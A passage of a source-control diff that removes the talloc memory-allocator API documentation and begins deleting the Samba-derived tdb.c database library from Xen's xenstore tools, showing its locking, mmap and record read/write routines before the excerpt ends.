-This function does not allocate any memory. It just copies the
-supplied pointer into the internal representation of the talloc
-ptr. This means you must not pass a name pointer to memory that will
-disappear before the ptr is freed with talloc_free().
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-void *talloc_named(const void *context, size_t size, const char *fmt, ...);
-
-The talloc_named() function creates a named talloc pointer. It is
-equivalent to:
-
-   ptr = talloc_size(context, size);
-   talloc_set_name(ptr, fmt, ....);
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-void *talloc_named_const(const void *context, size_t size, const char *name);
-
-This is equivalent to:
-
-   ptr = talloc_size(context, size);
-   talloc_set_name_const(ptr, name);
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-const char *talloc_get_name(const void *ptr);
-
-This returns the current name for the given talloc pointer. See
-talloc_set_name() for details.
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-void *talloc_init(const char *fmt, ...);
-
-This function creates a zero length named talloc context as a top
-level context. It is equivalent to:
-
-  talloc_named(NULL, 0, fmt, ...);
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-void *talloc_new(void *ctx);
-
-This is a utility macro that creates a new memory context hanging
-off an exiting context, automatically naming it "talloc_new: __location__"
-where __location__ is the source line it is called from. It is
-particularly useful for creating a new temporary working context.
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-(type *)talloc_realloc(const void *context, void *ptr, type, count);
-
-The talloc_realloc() macro changes the size of a talloc
-pointer. The "count" argument is the number of elements of type "type"
-that you want the resulting pointer to hold. 
-
-talloc_realloc() has the following equivalences:
-
-  talloc_realloc(context, NULL, type, 1) ==> talloc(context, type);
-  talloc_realloc(context, NULL, type, N) ==> talloc_array(context, type, N);
-  talloc_realloc(context, ptr, type, 0)  ==> talloc_free(ptr);
-
-The "context" argument is only used if "ptr" is not NULL, otherwise it
-is ignored.
-
-talloc_realloc() returns the new pointer, or NULL on failure. The call
-will fail either due to a lack of memory, or because the pointer has
-more than one parent (see talloc_reference()).
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-void *talloc_realloc_size(const void *context, void *ptr, size_t size);
-
-the talloc_realloc_size() function is useful when the type is not 
-known so the typesafe talloc_realloc() cannot be used.
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-void *talloc_steal(const void *new_ctx, const void *ptr);
-
-The talloc_steal() function changes the parent context of a talloc
-pointer. It is typically used when the context that the pointer is
-currently a child of is going to be freed and you wish to keep the
-memory for a longer time. 
-
-The talloc_steal() function returns the pointer that you pass it. It
-does not have any failure modes.
-
-NOTE: It is possible to produce loops in the parent/child relationship
-if you are not careful with talloc_steal(). No guarantees are provided
-as to your sanity or the safety of your data if you do this.
-
-talloc_steal (new_ctx, NULL) will return NULL with no sideeffects.
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-off_t talloc_total_size(const void *ptr);
-
-The talloc_total_size() function returns the total size in bytes used
-by this pointer and all child pointers. Mostly useful for debugging.
-
-Passing NULL is allowed, but it will only give a meaningful result if
-talloc_enable_leak_report() or talloc_enable_leak_report_full() has
-been called.
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-off_t talloc_total_blocks(const void *ptr);
-
-The talloc_total_blocks() function returns the total memory block
-count used by this pointer and all child pointers. Mostly useful for
-debugging.
-
-Passing NULL is allowed, but it will only give a meaningful result if
-talloc_enable_leak_report() or talloc_enable_leak_report_full() has
-been called.
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-void talloc_report(const void *ptr, FILE *f);
-
-The talloc_report() function prints a summary report of all memory
-used by ptr. One line of report is printed for each immediate child of
-ptr, showing the total memory and number of blocks used by that child.
-
-You can pass NULL for the pointer, in which case a report is printed
-for the top level memory context, but only if
-talloc_enable_leak_report() or talloc_enable_leak_report_full() has
-been called.
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-void talloc_report_full(const void *ptr, FILE *f);
-
-This provides a more detailed report than talloc_report(). It will
-recursively print the ensire tree of memory referenced by the
-pointer. References in the tree are shown by giving the name of the
-pointer that is referenced.
-
-You can pass NULL for the pointer, in which case a report is printed
-for the top level memory context, but only if
-talloc_enable_leak_report() or talloc_enable_leak_report_full() has
-been called.
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-void talloc_enable_leak_report(void);
-
-This enables calling of talloc_report(NULL, stderr) when the program
-exits. In Samba4 this is enabled by using the --leak-report command
-line option.
-
-For it to be useful, this function must be called before any other
-talloc function as it establishes a "null context" that acts as the
-top of the tree. If you don't call this function first then passing
-NULL to talloc_report() or talloc_report_full() won't give you the
-full tree printout.
-
-Here is a typical talloc report:
-
-talloc report on 'null_context' (total 267 bytes in 15 blocks)
-        libcli/auth/spnego_parse.c:55  contains     31 bytes in   2 blocks
-        libcli/auth/spnego_parse.c:55  contains     31 bytes in   2 blocks
-        iconv(UTF8,CP850)              contains     42 bytes in   2 blocks
-        libcli/auth/spnego_parse.c:55  contains     31 bytes in   2 blocks
-        iconv(CP850,UTF8)              contains     42 bytes in   2 blocks
-        iconv(UTF8,UTF-16LE)           contains     45 bytes in   2 blocks
-        iconv(UTF-16LE,UTF8)           contains     45 bytes in   2 blocks
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-void talloc_enable_leak_report_full(void);
-
-This enables calling of talloc_report_full(NULL, stderr) when the
-program exits. In Samba4 this is enabled by using the
---leak-report-full command line option.
-
-For it to be useful, this function must be called before any other
-talloc function as it establishes a "null context" that acts as the
-top of the tree. If you don't call this function first then passing
-NULL to talloc_report() or talloc_report_full() won't give you the
-full tree printout.
-
-Here is a typical full report:
-
-full talloc report on 'root' (total 18 bytes in 8 blocks)
-    p1                             contains     18 bytes in   7 blocks (ref 0)
-        r1                             contains     13 bytes in   2 blocks 
(ref 0)
-            reference to: p2
-        p2                             contains      1 bytes in   1 blocks 
(ref 1)
-        x3                             contains      1 bytes in   1 blocks 
(ref 0)
-        x2                             contains      1 bytes in   1 blocks 
(ref 0)
-        x1                             contains      1 bytes in   1 blocks 
(ref 0)
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-void talloc_enable_null_tracking(void);
-
-This enables tracking of the NULL memory context without enabling leak
-reporting on exit. Useful for when you want to do your own leak
-reporting call via talloc_report_null_full();
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-(type *)talloc_zero(const void *ctx, type);
-
-The talloc_zero() macro is equivalent to:
-
-  ptr = talloc(ctx, type);
-  if (ptr) memset(ptr, 0, sizeof(type));
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-void *talloc_zero_size(const void *ctx, size_t size)
-
-The talloc_zero_size() function is useful when you don't have a known type
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-void *talloc_memdup(const void *ctx, const void *p, size_t size);
-
-The talloc_memdup() function is equivalent to:
-
-  ptr = talloc_size(ctx, size);
-  if (ptr) memcpy(ptr, p, size);
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-char *talloc_strdup(const void *ctx, const char *p);
-
-The talloc_strdup() function is equivalent to:
-
-  ptr = talloc_size(ctx, strlen(p)+1);
-  if (ptr) memcpy(ptr, p, strlen(p)+1);
-
-This functions sets the name of the new pointer to the passed
-string. This is equivalent to:
-   talloc_set_name_const(ptr, ptr)
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-char *talloc_strndup(const void *t, const char *p, size_t n);
-
-The talloc_strndup() function is the talloc equivalent of the C
-library function strndup()
-
-This functions sets the name of the new pointer to the passed
-string. This is equivalent to:
-   talloc_set_name_const(ptr, ptr)
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-char *talloc_vasprintf(const void *t, const char *fmt, va_list ap);
-
-The talloc_vasprintf() function is the talloc equivalent of the C
-library function vasprintf()
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-char *talloc_asprintf(const void *t, const char *fmt, ...);
-
-The talloc_asprintf() function is the talloc equivalent of the C
-library function asprintf()
-
-This functions sets the name of the new pointer to the passed
-string. This is equivalent to:
-   talloc_set_name_const(ptr, ptr)
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-char *talloc_asprintf_append(char *s, const char *fmt, ...);
-
-The talloc_asprintf_append() function appends the given formatted 
-string to the given string. 
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-(type *)talloc_array(const void *ctx, type, uint_t count);
-
-The talloc_array() macro is equivalent to:
-
-  (type *)talloc_size(ctx, sizeof(type) * count);
-
-except that it provides integer overflow protection for the multiply,
-returning NULL if the multiply overflows.
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-void *talloc_array_size(const void *ctx, size_t size, uint_t count);
-
-The talloc_array_size() function is useful when the type is not
-known. It operates in the same way as talloc_array(), but takes a size
-instead of a type.
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-void *talloc_realloc_fn(const void *ctx, void *ptr, size_t size);
-
-This is a non-macro version of talloc_realloc(), which is useful 
-as libraries sometimes want a ralloc function pointer. A realloc()
-implementation encapsulates the functionality of malloc(), free() and
-realloc() in one call, which is why it is useful to be able to pass
-around a single function pointer.
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-void *talloc_autofree_context(void);
-
-This is a handy utility function that returns a talloc context
-which will be automatically freed on program exit. This can be used
-to reduce the noise in memory leak reports.
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-void *talloc_check_name(const void *ptr, const char *name);
-
-This function checks if a pointer has the specified name. If it does
-then the pointer is returned. It it doesn't then NULL is returned.
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-(type *)talloc_get_type(const void *ptr, type);
-
-This macro allows you to do type checking on talloc pointers. It is
-particularly useful for void* private pointers. It is equivalent to
-this:
-
-   (type *)talloc_check_name(ptr, #type)
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-talloc_set_type(const void *ptr, type);
-
-This macro allows you to force the name of a pointer to be a
-particular type. This can be used in conjunction with
-talloc_get_type() to do type checking on void* pointers.
-
-It is equivalent to this:
-   talloc_set_name_const(ptr, #type)
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-talloc_get_size(const void *ctx);
-
-This function lets you know the amount of memory alloced so far by
-this context. It does NOT account for subcontext memory.
-This can be used to calculate the size of an array.
-
diff -r 10a8fae412c5 tools/xenstore/tdb.c
--- a/tools/xenstore/tdb.c      Wed Jan 14 13:43:17 2009 +0000
+++ /dev/null   Thu Jan 01 00:00:00 1970 +0000
@@ -1,2151 +0,0 @@
- /* 
-   Unix SMB/CIFS implementation.
-
-   trivial database library
-
-   Copyright (C) Andrew Tridgell              1999-2004
-   Copyright (C) Paul `Rusty' Russell             2000
-   Copyright (C) Jeremy Allison                           2000-2003
-   
-     ** NOTE! The following LGPL license applies to the tdb
-     ** library. This does NOT imply that all of Samba is released
-     ** under the LGPL
-   
-   This library is free software; you can redistribute it and/or
-   modify it under the terms of the GNU Lesser General Public
-   License as published by the Free Software Foundation; either
-   version 2 of the License, or (at your option) any later version.
-
-   This library is distributed in the hope that it will be useful,
-   but WITHOUT ANY WARRANTY; without even the implied warranty of
-   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
-   Lesser General Public License for more details.
-
-   You should have received a copy of the GNU Lesser General Public
-   License along with this library; if not, write to the Free Software
-   Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
-*/
-
-
-#ifndef _SAMBA_BUILD_
-#ifdef HAVE_CONFIG_H
-#include <config.h>
-#endif
-
-#include <stdlib.h>
-#include <stdio.h>
-#include <stdint.h>
-#include <fcntl.h>
-#include <unistd.h>
-#include <string.h>
-#include <fcntl.h>
-#include <errno.h>
-#include <sys/mman.h>
-#include <sys/stat.h>
-#include "tdb.h"
-#include <stdarg.h>
-#include "talloc.h"
-#undef HAVE_MMAP
-#else
-#include "includes.h"
-#include "lib/tdb/include/tdb.h"
-#include "system/time.h"
-#include "system/shmem.h"
-#include "system/filesys.h"
-#endif
-
-#define TDB_MAGIC_FOOD "TDB file\n"
-#define TDB_VERSION (0x26011967 + 6)
-#define TDB_MAGIC (0x26011999U)
-#define TDB_FREE_MAGIC (~TDB_MAGIC)
-#define TDB_DEAD_MAGIC (0xFEE1DEAD)
-#define TDB_ALIGNMENT 4
-#define MIN_REC_SIZE (2*sizeof(struct list_struct) + TDB_ALIGNMENT)
-#define DEFAULT_HASH_SIZE 131
-#define TDB_PAGE_SIZE 0x2000
-#define FREELIST_TOP (sizeof(struct tdb_header))
-#define TDB_ALIGN(x,a) (((x) + (a)-1) & ~((a)-1))
-#define TDB_BYTEREV(x) 
(((((x)&0xff)<<24)|((x)&0xFF00)<<8)|(((x)>>8)&0xFF00)|((x)>>24))
-#define TDB_DEAD(r) ((r)->magic == TDB_DEAD_MAGIC)
-#define TDB_BAD_MAGIC(r) ((r)->magic != TDB_MAGIC && !TDB_DEAD(r))
-#define TDB_HASH_TOP(hash) (FREELIST_TOP + (BUCKET(hash)+1)*sizeof(tdb_off))
-#define TDB_DATA_START(hash_size) (TDB_HASH_TOP(hash_size-1))
-
-
-/* NB assumes there is a local variable called "tdb" that is the
- * current context, also takes doubly-parenthesized print-style
- * argument. */
-#define TDB_LOG(x) tdb->log_fn x
-
-/* lock offsets */
-#define GLOBAL_LOCK 0
-#define ACTIVE_LOCK 4
-
-#ifndef MAP_FILE
-#define MAP_FILE 0
-#endif
-
-#ifndef MAP_FAILED
-#define MAP_FAILED ((void *)-1)
-#endif
-
-#ifndef discard_const_p
-# if defined(__intptr_t_defined) || defined(HAVE_INTPTR_T)
-#  define discard_const(ptr) ((void *)((intptr_t)(ptr)))
-# else
-#  define discard_const(ptr) ((void *)(ptr))
-# endif
-# define discard_const_p(type, ptr) ((type *)discard_const(ptr))
-#endif
-
-/* free memory if the pointer is valid and zero the pointer */
-#ifndef SAFE_FREE
-#define SAFE_FREE(x) do { if ((x) != NULL) {talloc_free(discard_const_p(void 
*, (x))); (x)=NULL;} } while(0)
-#endif
-
-#define BUCKET(hash) ((hash) % tdb->header.hash_size)
-TDB_DATA tdb_null;
-
-/* all contexts, to ensure no double-opens (fcntl locks don't nest!) */
-static TDB_CONTEXT *tdbs = NULL;
-
-static int tdb_munmap(TDB_CONTEXT *tdb)
-{
-       if (tdb->flags & TDB_INTERNAL)
-               return 0;
-
-#ifdef HAVE_MMAP
-       if (tdb->map_ptr) {
-               int ret = munmap(tdb->map_ptr, tdb->map_size);
-               if (ret != 0)
-                       return ret;
-       }
-#endif
-       tdb->map_ptr = NULL;
-       return 0;
-}
-
-static void tdb_mmap(TDB_CONTEXT *tdb)
-{
-       if (tdb->flags & TDB_INTERNAL)
-               return;
-
-#ifdef HAVE_MMAP
-       if (!(tdb->flags & TDB_NOMMAP)) {
-               tdb->map_ptr = mmap(NULL, tdb->map_size, 
-                                   PROT_READ|(tdb->read_only? 0:PROT_WRITE), 
-                                   MAP_SHARED|MAP_FILE, tdb->fd, 0);
-
-               /*
-                * NB. When mmap fails it returns MAP_FAILED *NOT* NULL !!!!
-                */
-
-               if (tdb->map_ptr == MAP_FAILED) {
-                       tdb->map_ptr = NULL;
-                       TDB_LOG((tdb, 2, "tdb_mmap failed for size %d (%s)\n", 
-                                tdb->map_size, strerror(errno)));
-               }
-       } else {
-               tdb->map_ptr = NULL;
-       }
-#else
-       tdb->map_ptr = NULL;
-#endif
-}
-
-/* Endian conversion: we only ever deal with 4 byte quantities */
-static void *convert(void *buf, uint32_t size)
-{
-       uint32_t i, *p = buf;
-       for (i = 0; i < size / 4; i++)
-               p[i] = TDB_BYTEREV(p[i]);
-       return buf;
-}
-#define DOCONV() (tdb->flags & TDB_CONVERT)
-#define CONVERT(x) (DOCONV() ? convert(&x, sizeof(x)) : &x)
-
-/* the body of the database is made of one list_struct for the free space
-   plus a separate data list for each hash value */
-struct list_struct {
-       tdb_off next; /* offset of the next record in the list */
-       tdb_len rec_len; /* total byte length of record */
-       tdb_len key_len; /* byte length of key */
-       tdb_len data_len; /* byte length of data */
-       uint32_t full_hash; /* the full 32 bit hash of the key */
-       uint32_t magic;   /* try to catch errors */
-       /* the following union is implied:
-               union {
-                       char record[rec_len];
-                       struct {
-                               char key[key_len];
-                               char data[data_len];
-                       }
-                       uint32_t totalsize; (tailer)
-               }
-       */
-};
-
-/* a byte range locking function - return 0 on success
-   this functions locks/unlocks 1 byte at the specified offset.
-
-   On error, errno is also set so that errors are passed back properly
-   through tdb_open(). */
-static int tdb_brlock(TDB_CONTEXT *tdb, tdb_off offset, 
-                     int rw_type, int lck_type, int probe)
-{
-       struct flock fl;
-       int ret;
-
-       if (tdb->flags & TDB_NOLOCK)
-               return 0;
-       if ((rw_type == F_WRLCK) && (tdb->read_only)) {
-               errno = EACCES;
-               return -1;
-       }
-
-       fl.l_type = rw_type;
-       fl.l_whence = SEEK_SET;
-       fl.l_start = offset;
-       fl.l_len = 1;
-       fl.l_pid = 0;
-
-       do {
-               ret = fcntl(tdb->fd,lck_type,&fl);
-       } while (ret == -1 && errno == EINTR);
-
-       if (ret == -1) {
-               if (!probe && lck_type != F_SETLK) {
-                       /* Ensure error code is set for log fun to examine. */
-                       tdb->ecode = TDB_ERR_LOCK;
-                       TDB_LOG((tdb, 5,"tdb_brlock failed (fd=%d) at offset %d 
rw_type=%d lck_type=%d\n", 
-                                tdb->fd, offset, rw_type, lck_type));
-               }
-               /* Generic lock error. errno set by fcntl.
-                * EAGAIN is an expected return from non-blocking
-                * locks. */
-               if (errno != EAGAIN) {
-               TDB_LOG((tdb, 5, "tdb_brlock failed (fd=%d) at offset %d 
rw_type=%d lck_type=%d: %s\n", 
-                                tdb->fd, offset, rw_type, lck_type, 
-                                strerror(errno)));
-               }
-               return TDB_ERRCODE(TDB_ERR_LOCK, -1);
-       }
-       return 0;
-}
-
-/* lock a list in the database. list -1 is the alloc list */
-static int tdb_lock(TDB_CONTEXT *tdb, int list, int ltype)
-{
-       if (list < -1 || list >= (int)tdb->header.hash_size) {
-               TDB_LOG((tdb, 0,"tdb_lock: invalid list %d for ltype=%d\n", 
-                          list, ltype));
-               return -1;
-       }
-       if (tdb->flags & TDB_NOLOCK)
-               return 0;
-
-       /* Since fcntl locks don't nest, we do a lock for the first one,
-          and simply bump the count for future ones */
-       if (tdb->locked[list+1].count == 0) {
-               if (tdb_brlock(tdb,FREELIST_TOP+4*list,ltype,F_SETLKW, 0)) {
-                       TDB_LOG((tdb, 0,"tdb_lock failed on list %d ltype=%d 
(%s)\n", 
-                                          list, ltype, strerror(errno)));
-                       return -1;
-               }
-               tdb->locked[list+1].ltype = ltype;
-       }
-       tdb->locked[list+1].count++;
-       return 0;
-}
-
-/* unlock the database: returns void because it's too late for errors. */
-       /* changed to return int it may be interesting to know there
-          has been an error  --simo */
-static int tdb_unlock(TDB_CONTEXT *tdb, int list,
-                     int ltype __attribute__((unused)))
-{
-       int ret = -1;
-
-       if (tdb->flags & TDB_NOLOCK)
-               return 0;
-
-       /* Sanity checks */
-       if (list < -1 || list >= (int)tdb->header.hash_size) {
-               TDB_LOG((tdb, 0, "tdb_unlock: list %d invalid (%d)\n", list, 
tdb->header.hash_size));
-               return ret;
-       }
-
-       if (tdb->locked[list+1].count==0) {
-               TDB_LOG((tdb, 0, "tdb_unlock: count is 0\n"));
-               return ret;
-       }
-
-       if (tdb->locked[list+1].count == 1) {
-               /* Down to last nested lock: unlock underneath */
-               ret = tdb_brlock(tdb, FREELIST_TOP+4*list, F_UNLCK, F_SETLKW, 
0);
-       } else {
-               ret = 0;
-       }
-       tdb->locked[list+1].count--;
-
-       if (ret)
-               TDB_LOG((tdb, 0,"tdb_unlock: An error occurred unlocking!\n")); 
-       return ret;
-}
-
-/* This is based on the hash algorithm from gdbm */
-static uint32_t default_tdb_hash(TDB_DATA *key)
-{
-       uint32_t value; /* Used to compute the hash value.  */
-       uint32_t   i;   /* Used to cycle through random values. */
-
-       /* Set the initial value from the key size. */
-       for (value = 0x238F13AF * key->dsize, i=0; i < key->dsize; i++)
-               value = (value + (key->dptr[i] << (i*5 % 24)));
-
-       return (1103515243 * value + 12345);  
-}
-
-/* check for an out of bounds access - if it is out of bounds then
-   see if the database has been expanded by someone else and expand
-   if necessary 
-   note that "len" is the minimum length needed for the db
-*/
-static int tdb_oob(TDB_CONTEXT *tdb, tdb_off len, int probe)
-{
-       struct stat st;
-       if (len <= tdb->map_size)
-               return 0;
-       if (tdb->flags & TDB_INTERNAL) {
-               if (!probe) {
-                       /* Ensure ecode is set for log fn. */
-                       tdb->ecode = TDB_ERR_IO;
-                       TDB_LOG((tdb, 0,"tdb_oob len %d beyond internal malloc 
size %d\n",
-                                (int)len, (int)tdb->map_size));
-               }
-               return TDB_ERRCODE(TDB_ERR_IO, -1);
-       }
-
-       if (fstat(tdb->fd, &st) == -1)
-               return TDB_ERRCODE(TDB_ERR_IO, -1);
-
-       if (st.st_size < (off_t)len) {
-               if (!probe) {
-                       /* Ensure ecode is set for log fn. */
-                       tdb->ecode = TDB_ERR_IO;
-                       TDB_LOG((tdb, 0,"tdb_oob len %d beyond eof at %d\n",
-                                (int)len, (int)st.st_size));
-               }
-               return TDB_ERRCODE(TDB_ERR_IO, -1);
-       }
-
-       /* Unmap, update size, remap */
-       if (tdb_munmap(tdb) == -1)
-               return TDB_ERRCODE(TDB_ERR_IO, -1);
-       tdb->map_size = st.st_size;
-       tdb_mmap(tdb);
-       return 0;
-}
-
-/* write a lump of data at a specified offset */
-static int tdb_write(TDB_CONTEXT *tdb, tdb_off off, void *buf, tdb_len len)
-{
-       if (tdb_oob(tdb, off + len, 0) != 0)
-               return -1;
-
-       if (tdb->map_ptr)
-               memcpy(off + (char *)tdb->map_ptr, buf, len);
-#ifdef HAVE_PWRITE
-       else if (pwrite(tdb->fd, buf, len, off) != (ssize_t)len) {
-#else
-       else if (lseek(tdb->fd, off, SEEK_SET) != (off_t)off
-                || write(tdb->fd, buf, len) != (off_t)len) {
-#endif
-               /* Ensure ecode is set for log fn. */
-               tdb->ecode = TDB_ERR_IO;
-               TDB_LOG((tdb, 0,"tdb_write failed at %d len=%d (%s)\n",
-                          off, len, strerror(errno)));
-               return TDB_ERRCODE(TDB_ERR_IO, -1);
-       }
-       return 0;
-}
-
-/* read a lump of data at a specified offset, maybe convert */
-static int tdb_read(TDB_CONTEXT *tdb,tdb_off off,void *buf,tdb_len len,int cv)
-{
-       if (tdb_oob(tdb, off + len, 0) != 0)
-               return -1;
-
-       if (tdb->map_ptr)
-               memcpy(buf, off + (char *)tdb->map_ptr, len);
-#ifdef HAVE_PREAD
-       else if (pread(tdb->fd, buf, len, off) != (off_t)len) {
-#else
-       else if (lseek(tdb->fd, off, SEEK_SET) != (off_t)off
-                || read(tdb->fd, buf, len) != (off_t)len) {
-#endif
-               /* Ensure ecode is set for log fn. */
-               tdb->ecode = TDB_ERR_IO;
-               TDB_LOG((tdb, 0,"tdb_read failed at %d len=%d (%s)\n",
-                          off, len, strerror(errno)));
-               return TDB_ERRCODE(TDB_ERR_IO, -1);
-       }
-       if (cv)
-               convert(buf, len);
-       return 0;
-}
-
-/* don't allocate memory: used in tdb_delete path. */
-static int tdb_key_eq(TDB_CONTEXT *tdb, tdb_off off, TDB_DATA key)
-{
-       char buf[64];
-       uint32_t len;
-
-       if (tdb_oob(tdb, off + key.dsize, 0) != 0)
-               return -1;
-
-       if (tdb->map_ptr)
-               return !memcmp(off + (char*)tdb->map_ptr, key.dptr, key.dsize);
-
-       while (key.dsize) {
-               len = key.dsize;
-               if (len > sizeof(buf))
-                       len = sizeof(buf);
-               if (tdb_read(tdb, off, buf, len, 0) != 0)
-                       return -1;
-               if (memcmp(buf, key.dptr, len) != 0)
-                       return 0;
-               key.dptr += len;
-               key.dsize -= len;
-               off += len;
-       }
-       return 1;
-}
-
-/* read a lump of data, allocating the space for it */
-static char *tdb_alloc_read(TDB_CONTEXT *tdb, tdb_off offset, tdb_len len)
-{
-       char *buf;
-
-       if (!(buf = talloc_size(tdb, len))) {
-               /* Ensure ecode is set for log fn. */
-               tdb->ecode = TDB_ERR_OOM;
-               TDB_LOG((tdb, 0,"tdb_alloc_read malloc failed len=%d (%s)\n",
-                          len, strerror(errno)));
-               return TDB_ERRCODE(TDB_ERR_OOM, buf);
-       }
-       if (tdb_read(tdb, offset, buf, len, 0) == -1) {
-               SAFE_FREE(buf);
-               return NULL;
-       }
-       return buf;
-}
-
-/* read/write a tdb_off */
-static int ofs_read(TDB_CONTEXT *tdb, tdb_off offset, tdb_off *d)
-{
-       return tdb_read(tdb, offset, (char*)d, sizeof(*d), DOCONV());
-}
-static int ofs_write(TDB_CONTEXT *tdb, tdb_off offset, tdb_off *d)
-{
-       tdb_off off = *d;
-       return tdb_write(tdb, offset, CONVERT(off), sizeof(*d));
-}
-
-/* read/write a record */
-static int rec_read(TDB_CONTEXT *tdb, tdb_off offset, struct list_struct *rec)
-{
-       if (tdb_read(tdb, offset, rec, sizeof(*rec),DOCONV()) == -1)
-               return -1;
-       if (TDB_BAD_MAGIC(rec)) {
-               /* Ensure ecode is set for log fn. */
-               tdb->ecode = TDB_ERR_CORRUPT;
-               TDB_LOG((tdb, 0,"rec_read bad magic 0x%x at offset=%d\n", 
rec->magic, offset));
-               return TDB_ERRCODE(TDB_ERR_CORRUPT, -1);
-       }
-       return tdb_oob(tdb, rec->next+sizeof(*rec), 0);
-}
-static int rec_write(TDB_CONTEXT *tdb, tdb_off offset, struct list_struct *rec)
-{
-       struct list_struct r = *rec;
-       return tdb_write(tdb, offset, CONVERT(r), sizeof(r));
-}
-
-/* read a freelist record and check for simple errors */
-static int rec_free_read(TDB_CONTEXT *tdb, tdb_off off, struct list_struct 
*rec)
-{
-       if (tdb_read(tdb, off, rec, sizeof(*rec),DOCONV()) == -1)
-               return -1;
-
-       if (rec->magic == TDB_MAGIC) {
-               /* this happens when a app is showdown while deleting a record 
- we should
-                  not completely fail when this happens */
-               TDB_LOG((tdb, 0,"rec_free_read non-free magic 0x%x at offset=%d 
- fixing\n", 
-                        rec->magic, off));
-               rec->magic = TDB_FREE_MAGIC;
-               if (tdb_write(tdb, off, rec, sizeof(*rec)) == -1)
-                       return -1;
-       }
-
-       if (rec->magic != TDB_FREE_MAGIC) {
-               /* Ensure ecode is set for log fn. */
-               tdb->ecode = TDB_ERR_CORRUPT;
-               TDB_LOG((tdb, 0,"rec_free_read bad magic 0x%x at offset=%d\n", 
-                          rec->magic, off));
-               return TDB_ERRCODE(TDB_ERR_CORRUPT, -1);
-       }
-       if (tdb_oob(tdb, rec->next+sizeof(*rec), 0) != 0)
-               return -1;
-       return 0;
-}
-
-/* update a record tailer (must hold allocation lock) */
-static int update_tailer(TDB_CONTEXT *tdb, tdb_off offset,
-                        const struct list_struct *rec)
-{
-       tdb_off totalsize;
-
-       /* Offset of tailer from record header */
-       totalsize = sizeof(*rec) + rec->rec_len;
-       return ofs_write(tdb, offset + totalsize - sizeof(tdb_off),
-                        &totalsize);
-}
-
